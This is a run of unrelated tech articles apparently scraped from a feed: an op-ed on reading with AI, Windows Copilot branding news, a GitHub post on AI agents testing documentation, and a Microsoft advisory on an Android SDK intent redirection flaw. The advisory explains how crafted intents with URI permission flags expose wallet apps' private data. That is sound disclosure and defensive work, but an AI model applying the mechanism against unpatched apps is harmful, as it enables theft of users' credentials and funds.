This is a follow-up to my recent piece “AI Coach or AI Ghostwriter? The Choice Is Yours,” which argued that AI can either sharpen your thinking or replace it. That piece was about writing. This one is about the other side of the coin: reading. The practical question is: how do you use AI to become a more productive reader rather than a lazier one?
Back in 2006, my UW students and I coined the term “machine reading” to describe the autonomous understanding of text by computers (Etzioni, Banko, & Cafarella, AAAI 2006). Two decades later, large language models (LLMs) can digest, summarize, and answer questions about text with startling competence. The irony is that the biggest consumers of this capability are people, using AI to do our reading for us.
AI-assisted reading has become so pervasive that we are approaching the absurdity captured in Tom Fishburne’s famous Marketoonist cartoon: “AI Written, AI Read.” One AI writes the memo, another AI summarizes it, with minimal human involvement.
The simplest use of AI for reading is summarization, and it certainly has its merits. Drop a 50-page PDF into your favorite LLM, ask for a summary, and you’ll get one in seconds.
But that summary is merely a skeleton. It strips away the voice, the best lines, the telling details, and the nuances that can make or break your understanding. If you are reading a legal contract, the details are the whole point. If you are reading a competitor’s product announcement, the spin they put on the numbers matters more than the numbers themselves. A skeleton doesn’t have a pulse!
AI-assisted reading punishes passivity. A recent Wharton study of over 10,000 participants found that people who relied on AI-generated summaries showed shallower knowledge and offered fewer concrete facts afterward compared to those who engaged with original sources. Advice written after AI use was shorter, less factual, and more homogeneous across users. In other words, AI summaries do not just compress text. They flatten it. Speed reading via AI can be a bit like speed dating: you cover a lot of ground, but you do not actually know anyone when you leave.
The fundamental question here is not productivity. It is about the impact of AI reading on you as the reader: What happens to your retention, your understanding, your ability to synthesize across sources? Are you winning by doing this, or are you atrophying the cognitive muscle that makes you good at your job? Outsourcing your thinking to AI is not productivity gain; it’s a competence leak.
My practical advice is: treat the summary as a triage tool, not a destination. Use it to decide whether a document deserves your time. That is genuinely valuable. The world produces more text than any human can process, and AI can help you sort the wheat from the chaff in minutes instead of hours. But once you decide that something matters, put down the summary and engage with the source.
The real power of AI reading lies not in one-shot summarization but in dialog. Think of it as an interrogation of the document, focused on what interests you. Upload the contract, the research paper, or the earnings call transcript, and then start asking questions. What are the three riskiest clauses? How does this methodology compare to the Chen et al. paper from last year? Where does the CFO’s commentary contradict the numbers in Table 4? This is not a command you fire off and forget. It is a back-and-forth conversation between you and the AI about the text, one that surfaces specific quotes, draws connections to related materials, and drills into exactly what you need. The quality of the conversation depends entirely on the quality of your questions. AI-assisted reading rewards curiosity.
A word of caution that I can’t repeat often enough: always verify anything important yourself. AI models hallucinate. They fabricate quotes, invent statistics, and present fiction with the serene confidence of a tenured professor. The verification step is essential. If you skip it, you are not reading with AI. You are gambling with AI.
You also want to adopt different reading strategies for different tasks, just as you would without AI. Summarization is fine for getting the gist of a piece, for sorting your inbox, for deciding what to read next. It will not serve you well if you need to retain the content, defend it in a meeting, or build on it in your own work. For those tasks, you need the interrogation approach, and you need to supplement it with old-fashioned human reading of the passages the AI points you to.
Used well, AI can make you a better, faster, more thorough reader by helping you navigate more material, ask sharper questions, and spot connections you would have missed. Used badly, it turns you into a consumer of predigested pablum, the intellectual equivalent of living on protein shakes when there is a farmers’ market across the street.
The machines are happy to read for you, but they won’t understand for you. The choice, as always, is yours.
Editor’s note: GeekWire publishes guest opinions to foster informed discussion and highlight a diversity of perspectives on issues shaping the tech and startup community. If you’re interested in submitting a guest column, email us at tips@geekwire.com. Submissions are reviewed by our editorial team for relevance and editorial standards.
It looks like a smaller, cheaper Tesla is back on the menu.
Today, Reuters is reporting that the electric automaker is calling around to suppliers about building an all-new - that is, not based on the Model 3 or the Model Y - electric SUV that would be more affordable than its current lineup. The report, which is based on four anonymous sources in the know, said the vehicle would be built first in China, before eventually being brought to the US and European markets.
If true, this would represent a pretty major reversal for Tesla, and especially for Elon Musk, who has insisted over the past few years that the company doesn't need to make …
It’s finally happening! The Notepad app for Windows Insiders has officially ditched Copilot branding in favour of a subtler “Writing tools” icon. Earlier, Notepad had a very prominent, colorful Copilot logo near the top-right corner, which everyone despised, despite the ability to disable it.
Snipping Tool also had a Copilot icon that showed up after selecting an area with Quick markup enabled. But now, it seems even the regular version of Snipping Tool for all users has quietly removed the Copilot logo. Unlike Notepad, there was no option to manually disable Copilot in the Snipping Tool, which makes this a remarkable change.
Notepad and Snipping Tool remove Copilot
About three weeks ago, on March 20, the President of Windows and Devices, Pavan Davuluri, published a blog post for Windows Insiders titled “Our commitment to Windows quality”. It was basically Microsoft admitting that they went too far with the AI push, along with a clear roadmap to fix Windows 11.
One of the highlights of the blog was Microsoft’s decision to reduce “unnecessary Copilot entry points, starting with apps like Snipping Tool, Photos, Widgets, and Notepad.”
Although last in the list, Notepad has now removed the Copilot logo from the toolbar and replaced it with a new pen icon, which, when hovered over, shows “Writing tools” with no mention of the dreaded AI word.
And just like before, you can also turn off this AI tool in the Notepad settings. However, the option is now under “Advanced Features” and not “AI Features.”
Windows Notepad removed Copilot branding
In Notepad v11.2512.28.0, Microsoft removed Copilot branding completely from the Write, Rewrite, Summarize tools section and Notepad settings.
Windows Notepad version number that removed Copilot
Note that Microsoft didn’t completely remove AI from Notepad. It is just the Copilot logo and branding that was removed.
There might be skeptics and critics who say that the company could’ve removed AI completely, but I beg to differ because there is no going away from AI. All of big tech has already invested too much in AI, and it’s only fair to treat Microsoft with the same respect, or disrespect, depending on how you see AI.
The good news here is finally seeing Copilot branding go away, which was what really started all the hatred that Microsoft is dealing with now, including the “Microslop” monicker.
Plus, the AI that still exists in Notepad can be turned off with the flick of a button. Also, funnily enough, the tool doesn’t even mention AI anymore.
Writing tools powered by AI can be turned off in Notepad
To be honest, I didn’t expect Microsoft to be steadfast in removing a branding that they spent a lot of resources convincing users it was the future, like the rebranding of Office to Microsoft 365 Copilot.
Copilot in Notepad is renamed to Writing tools
Notepad settings had an “AI Features” section, with only Copilot under it. Now, it’s renamed to Advanced Features, with Writing tools the only feature. From the looks of it, there seems to be no change in functionality, and it’s only a rebranding.
AI Features in Notepad renamed to Writing featuresNotepad without Copilot doesn’t remove AI features
Turning off Writing tools will also remove the AI pen icon near the top-right corner.
Notepad with Writing tools turned off
Notepad turned from a simple text editor to a full-fledged text editor with formatting, spell check, tables, and markdown support, which was even responsible for an 8.8 rated security issue in Notepad. The app is also getting image support, as reported first by Windows Latest. Fortunately, most of these features can be manually turned off if you don’t need them.
Snipping Tool doesn’t show the Copilot icon anymore
Although a regular user of Snipping Tool, I didn’t notice the lack of this Copilot icon in the app until now. It just goes to show how ignorable the Copilot icon has become, as it was seen everywhere in Windows…
The Copilot icon from Snipping Tool has been removed
Also, unlike Notepad, there is no sign of AI anywhere in the Snipping Tool as of now.
Either way, the removal of Copilot from Notepad and Snipping Tool is a sign that Microsoft wasn’t bluffing about scaling down Copilot integration throughout Windows. But don’t be fooled into thinking that the Company is removing AI. It’s just the approach that is changing.
For early-stage open-source projects, the “Getting started” guide is often the first real interaction a developer has with the project. If a command fails, an output doesn’t match, or a step is unclear, most users won’t file a bug report, they will just move on.
Drasi, a CNCF sandbox project that detects changes in your data and triggers immediate reactions, is supported by our small team of four engineers in Microsoft Azure’s Office of the Chief Technology Officer. We have comprehensive tutorials, but we are shipping code faster than we can manually test them.
The team didn’t realize how big this gap was until late 2025, when GitHub updated its Dev Container infrastructure, bumping the minimum Docker version. The update broke the Docker daemon connection, and every single tutorial stopped working. Because we relied on manual testing, we didn’t immediately know the extent of the damage. Any developer trying Drasi during that window would have hit a wall.
This incident forced a realization: with advanced AI coding assistants, documentation testing can be converted to a monitoring problem.
The problem: Why does documentation break?
Documentation usually breaks for two reasons:
1. The curse of knowledge
Experienced developers write documentation with implicit context. When we write “wait for the query to bootstrap,” we know to run `drasi list query` and watch for the `Running` status, or even better to run the `drasi wait` command. A new user has no such context. Neither does an AI agent. They read the instructions literally and don’t know what to do. They get stuck on the “how,” while we only document the “what.”
2. Silent drift
Documentation doesn’t fail loudly like code does. When you rename a configuration file in your codebase, the build fails immediately. But when your documentation still references the old filename, nothing happens. The drift accumulates silently until a user reports confusion.
This is compounded for tutorials like ours, which spin up sandbox environments with Docker, k3d, and sample databases. When any upstream dependency changes—a deprecated flag, a bumped version, or a new default—our tutorials can break silently.
The solution: Agents as synthetic users
To solve this, we treated tutorial testing as a simulation problem. We built an AI agent that acts as a “synthetic new user.”
This agent has three critical characteristics:
It is naïve: It has no prior knowledge of Drasi—it knows only what is explicitly written in the tutorial.
It is literal: It executes every command exactly as written. If a step is missing, it fails.
It is unforgiving: It verifies every expected output. If the doc says, “You should see ‘Success’”, and the command line interface (CLI) just returns silently, the agent flags it and fails fast.
The stack: GitHub Copilot CLI and Dev Containers
We built a solution using GitHub Actions, Dev Containers, Playwright, and the GitHub Copilot CLI.
Our tutorials require heavy infrastructure:
A full Kubernetes cluster (k3d)
Docker-in-Docker
Real databases (such as PostgreSQL and MySQL)
We needed an environment that exactly matches what our human users experience. If users run in a specific Dev Container on GitHub Codespaces, our test must run in that same Dev Container.
The architecture
Inside the container, we invoke the Copilot CLI with a specialized system prompt (view the full prompt here):
This prompt using the prompt mode (-p) of the CLI agent gives us an agent that can execute terminal commands, write files, and run browser scripts—just like a human developer sitting at their terminal. For the agent to simulate a real user, it needs these capabilities.
To enable the agents to open webpages and interact with them as any human following the tutorial steps would, we also install Playwright on the Dev Container. The agent also takes screenshots which it then compares against those provided in the documentation.
Security model
Our security model is built around one principle: the container is the boundary.
Rather than trying to restrict individual commands (a losing game when the agent needs to run arbitrary node scripts for Playwright), we treat the entire Dev Container as an isolated sandbox and control what crosses its boundaries: no outbound network access beyond localhost, a Personal Access Token (PAT) with only “Copilot Requests” permission, ephemeral containers destroyed after each run, and a maintainer-approval gate for triggering workflows.
Dealing with non-determinism
One of the biggest challenges with AI-based testing is non-determinism. Large language models (LLMs) are probabilistic—sometimes the agent retries a command; other times it gives up.
We also have a list of tight constraints in our prompts that prevent the agent from going on a debugging journey, directives to control the structure of the final report, and also skip directives that tell the agent to bypass optional tutorial sections like setting up external services.
Artifacts for debugging
When a run fails, we need to know why. Since the agent is running in a transient container, we can’t just Secure Shell (SSH) in and look around.
So, our agent preserves evidence of every run, screenshots of web UIs, terminal output of critical commands, and a final markdown report detailing its reasoning like shown here:
These artifacts are uploaded to the GitHub Action run summary, allowing us to “time travel” back to the exact moment of failure and see what the agent saw.
Parsing the agent’s report
With LLMs, getting a definitive “Pass/Fail” signal that a machine can understand can be challenging. An agent might write a long, nuanced conclusion like:
To make this actionable in a CI/CD pipeline, we had to do some prompt engineering. We explicitly instructed the agent:
Simple techniques like this bridge the gap between AI’s fuzzy, probabilistic outputs and CI’s binary pass/fail expectations.
Automation
We now have an automated version of the workflow which runs weekly. This version evaluates all our tutorials every week in parallel—each tutorial gets its own sandbox container and a fresh perspective from the agent acting as a synthetic user. If any of the tutorial evaluation fails, the workflow is configured to file an issue on our GitHub repo.
This workflow can optionally also be run on pull-requests, but to prevent attacks we have added a maintainer-approval requirement and a `pull_request_target` trigger, which means that even on pull-requests by external contributors, the workflow that executes will be the one in our main branch.
Running the Copilot CLI requires a PAT token which is stored in the environment secrets for our repo. To make sure this does not leak, each run requires maintainer approval—except the automated weekly run which only runs on the `main` branch of our repo.
What we found: Bugs that matter
Since implementing this system, we have run over 200 “synthetic user” sessions. The agent identified 18 distinct issues including some serious environment issues and other documentation issues like these. Fixing them improved the docs for everyone, not just the bot.
Implicit dependencies: In one tutorial, we instructed users to create a tunnel to a service. The agent ran the command, and then—following the next instruction—killed the process to run the next command. The fix: We realized we hadn’t told the user to keep that terminal open. We added a warning: “This command blocks. Open a new terminal for subsequent steps.”
Missing verification steps: We wrote: “Verify the query is running.” The agent got stuck: “How, exactly?” The fix: We replaced the vague instruction with an explicit command: `drasi wait -f query.yaml`.
Format drift: Our CLI output had evolved. New columns were added; older fields were deprecated. The documentation screenshots still showed the 2024 version of the interface. A human tester might gloss over this (“it looks mostly right”). The agent flagged every mismatch, forcing us to keep our examples up to date.
AI as a force multiplier
We often hear about AI replacing humans, but in this case, the AI is providing us with a workforce we never had.
To replicate what our system does—running six tutorials across fresh environments every week—we would need a dedicated QA resource or a significant budget for manual testing. For a four-person team, that is impossible. By deploying these Synthetic Users, we have effectively hired a tireless QA engineer who works nights, weekends, and holidays.
Our tutorials are now validated weekly by synthetic users. try the Getting Started guide yourself and see the results firsthand. And if you’re facing the same documentation drift in your own project, consider GitHub Copilot CLI not just as a coding assistant, but as an agent—give it a prompt, a container, and a goal—and let it do the work a human doesn’t have time for.
During routine security research, we identified a severe intent redirection vulnerability in a widely used third-party Android SDK called EngageSDK. This flaw allows apps on the same device to bypass Android security sandbox and gain unauthorized access to private data. With over 30 million installations of third-party crypto wallet applications alone, the exposure of PII, user credentials and financial data were exposed to risk. All of the detected apps using vulnerable versions have been removed from Google Play.
Following our Coordinated Vulnerability Disclosure practices (via Microsoft Security Vulnerability Research), we notified EngageLab and the Android Security Team. We collaborated with all parties to investigate and validate the issue, which was resolved as of November 3, 2025 in version 5.2.1 of the EngageSDK. This case shows how weaknesses in third‑party SDKs can have large‑scale security implications, especially in high‑value sectors like digital asset management.
As of the time of writing, we are not aware of any evidence indicating that this vulnerability has been exploited in the wild. Nevertheless, we strongly recommend that developers who integrate the affected SDK upgrade to the latest available version. While this is a vulnerability introduced by a third-party SDK, Android’s existing layered security model is capable of providing additional mitigations against exploitation of vulnerabilities through intents. Android has updated these automatic user protections to provide additional mitigation against the specific EngageSDK risks described in this report while developers update to the non-vulnerable version of EngageSDK. Users who previously downloaded a vulnerable app are protected.
In this blog, we provide a technical analysis of a vulnerability that bypasses core Android security mechanisms. We also examine why this issue is significant in the current landscape: apps increasingly rely on third‑party SDKs, creating large and often opaque supply‑chain dependencies.
As mobile wallets and other high‑value apps become more common, even small flaws in upstream libraries can impact millions of devices. These risks increase when integrations expose exported components or rely on trust assumptions that aren’t validated across app boundaries.
Because Android apps frequently depend on external libraries, insecure integrations can introduce attack surfaces into otherwise secure applications. We provide resources for three key audiences:
Developers: In addition to the best practices Android provides its developers, we provide practical guidance on identifying and preventing similar flaws, including how to review dependencies and validate exported components.
Researchers: Insights into how we discovered the issue and the methodology we used to confirm its impact.
General readers: An explanation of the implications of this vulnerability and why ecosystem‑wide vigilance is essential.
This analysis reflects Microsoft’s visibility into cross‑platform security threats. We are committed to safeguarding users, even in environments and applications that Microsoft does not directly build or operate. You can find a detailed set of recommendations, detection guidance and indicators at the end of this post to help you assess exposure and strengthen protections.
Technical details
The Android operating system integrates a variety of security mechanisms, such as memory isolation, filesystem discretionary and mandatory access controls (DAC/MAC), biometric authentication, and network traffic encryption. Each of these components functions according to its own security framework, which may not always align with the others[1].
Unlike many other operating systems where applications run with the user’s privileges, Android assigns each app with a unique user ID and executes it within its own sandboxed environment. Each app has a private directory for storing data that is not meant to be shared. By default, other apps cannot access this private space unless the owning app explicitly exposes data through components known as content providers.
To facilitate communication between applications, Android uses intents[2]. Beyond inter-app messaging, intents also enable interaction among components within the same application as well as data sharing between those components.
It’s worth noting that while any application can send an intent to another app or component, whether that intent is actually delivered—and more broadly, whether the communication is permitted—depends on the identity and permissions of the sending application.
Intent redirection vulnerability
Intent Redirection occurs when a threat actor manipulates the contents of an intent that a vulnerable app sends using its own identity and permissions.
In this scenario, the threat actor leverages the trusted context of the affected app to run a malicious payload with the app’s privileges. This can lead to:
Unauthorized access to protected components
Exposure of sensitive data
Privilege escalation within the Android environment
Figure 1. Visual representation of an intent redirection.
Android Security Team classifies this vulnerability as severe. Apps flagged as vulnerable are subject to enforcement actions, including potential removal from the platform[3].
EngageLab SDK intent redirection
Developers use the EngageLab SDK to manage messaging and push notifications in mobile apps. It functions as a library that developers integrate into Android apps as a dependency. Once included, the SDK provides APIs for handling communication tasks, making it a core component for apps that require real-time engagement.
The vulnerability was identified in an exported activity (MTCommonActivity) that gets added to an application’s Android manifest once the library is imported into a project, after the build process. This activity only appears in the merged manifest, which is generated post-build (see figure below), and therefore is sometimes missed by developers. Consequently, it often escapes detection during development but remains exploitable in the final APK.
Figure 2. The vulnerable MTCommonActivity activity is added to the merged manifest.
When an activity is declared as exported in the Android manifest, it becomes accessible to other applications installed on the same device. This configuration permits any other application to explicitly send an intent to this activity.
The following section outlines the intent handling process from the moment the activity receives an intent to when it dispatches one under the affected application’s identity.
Intent processing in the vulnerable activity
When an activity receives an intent, its response depends on its current lifecycle state:
If the activity is starting for the first time, the onCreate() method runs.
If the activity is already active, the onNewIntent() method runs instead.
In the vulnerable MTCommonActivity, both callbacks invoke the processIntent() method.
Figure 3: Calling the processIntent() method.
This method (see figure below) begins by initializing the uri variable on line 10 using the data provided in the incoming intent. If the uri variable is not empty, then – according to line 16 – it invokes the processPlatformMessage():
Figure 4: The processIntent() method.
The processPlatformMessage() method instantiates a JSON object using the uri string supplied as an argument to this method (see line 32 below):
Figure 5: The processPlatformMessage() method.
Each branch of the if statement checks the JSON object for a field named n_intent_uri. If this field exists, the method performs the following actions:
Creates a NotificationMessage object
Initializes its intentUri field by using the appropriate setter (see line 52).
An examination of the intentUri field in the NotificationMessage class identified the following method as a relevant point of reference:
Figure 6: intentUri usage overview.
On line 353, the method above obtains the intentUri value and attempts to create a new intent from it by calling the method a() on line 360. The returned intent is subsequently dispatched using the startActivity() method on line 365. The a() method is particularly noteworthy, as it serves as the primary mechanism responsible for intent redirection:
Figure 7: Overview of vulnerable code.
This method appears to construct an implicit intent by invoking setComponent(), which clears the target component of the parseUri intent by assigning a null value (line 379). Under normal circumstances, such behavior would result in a standard implicit intent, which poses minimal risk because it does not specify a concrete component and therefore relies on the system’s resolution logic.
However, as observed on line 377, the method also instantiates a second intent variable — its purpose not immediately evident—which incorporates an explicit intent. Crucially, this explicitly targeted intent is the one returned at line 383, rather than the benign parseUri intent.
Another notable point is that the parseUri() method (at line 376) is called with the URI_ALLOW_UNSAFE flag (constant value 4), which can permit access to an application’s content providers [6] (see exploitation example below).
These substitutions fundamentally alter the method’s behavior: instead of returning a non‑directed, system‑resolved implicit intent, it returns an intent with a predefined component, enabling direct invocation of the targeted activity as well as access to the application’s content providers. As noted previously, this vulnerability can, among other consequences, permit access to the application’s private directory by gaining entry through any available content providers, even those that are not exported.
Figure 8: Getting READ/WRITE access to non-exported content providers.
Exploitation starts when a malicious app creates an intent object with a crafted URI in the extra field. The vulnerable app then processes this URI, creating and sending an intent using its own identity and permissions.
Due to the URI_ALLOW_UNSAFE flag, the intent URI may include the following flags;
FLAG_GRANT_PERSISTABLE_URI_PERMISSION
FLAG_GRANT_READ_URI_PERMISSION
FLAG_GRANT_WRITE_URI_PERMISSION
When combined, these flags grant persistent read and write access to the app’s private data.
After the vulnerable app processes the intent and applies these flags, the malicious app is authorized to interact with the target app’s content provider. This authorization remains active until the target app explicitly revokes it [5]. As a result, the internal directories of the vulnerable app are exposed, which allows unauthorized access to sensitive data in its private storage space. The following image illustrates an example of an exploitation intent:
Figure 9: Attacking the MTCommonActivity.
Affected applications
A significant number of apps using this SDK are part of the cryptocurrency and digital‑wallet ecosystem. Because of this, the consequences of this vulnerability are especially serious. Before notifying the vendor, Microsoft confirmed the flaw in multiple apps on the Google Play Store.
The affected wallet applications alone accounted for more than 30 million installations, and when including additional non‑wallet apps built on the same SDK, the total exposure climbed to over 50 million installations.
Disclosure timeline
Microsoft initially identified the vulnerability in version 4.5.4 of the EngageLab SDK. Following Coordinated Vulnerability Disclosure (CVD) practices through Microsoft Security Vulnerability Research (MSVR), the issue was reported to EngageLab in April 2025. Additionally, Microsoft notified the Android Security Team because the affected apps were distributed through the Google Play Store.
EngageLab addressed the vulnerability in version 5.2.1, released on November 3, 2025. In the fixed version, the vulnerable activity is set to non-exported, which prevents it from being invoked by other apps.
Date
Event
April 2025
Vulnerability identified in EngageLab SDK v4.5.4. Issue reported to EngageLab
May 2025
Escalated the issue to the Android Security Team for affected applications distributed through the Google Play Store.
November 3, 2025
EngageLab released v5.2.1, addressing the vulnerability
Mitigation and protection guidance
Android developers utilizing the EngageLab SDK are strongly advised to upgrade to the latest version promptly.
Our research indicates that integrating external libraries can inadvertently introduce features or components that may compromise application security. Specifically, adding an exported component to the merged Android manifest could be unintentionally overlooked, resulting in potential attack surfaces. To keep your apps secure, always review the merged Android manifest, especially when you incorporate third‑party SDKs. This helps you identify any components or permissions that might affect your app’s security or behavior.
Keep your users and applications secure
Strengthening mobile‑app defenses doesn’t end with understanding this vulnerability.
[1] Mayrhofer, René, Jeffrey Vander Stoep, Chad Brubaker, Dianne Hackborn, Bram Bonné, Güliz Seray Tuncay, Roger Piqueras Jover, and Michael A. Specter. The Android Platform Security Model (2023). ACM Transactions on Privacy and Security, vol. 24, no. 3, 2021, pp. 1–35. arXiv:1904.05572. https://doi.org/10.48550/arXiv.1904.05572.
This research is provided by Microsoft Defender Security Research with contributions from Dimitrios Valsamarasand other members of Microsoft Threat Intelligence.
Learn more
Review our documentation to learn more about our real-time protection capabilities and see how to enable them within your organization.
AI tool use is inescapable...especially if you're a young person trying to get an edge in an increasingly difficult job market. But cognitive offloading is dangerous, no matter what age you are. Building a knowledge base can save your brain and skills from atrophy.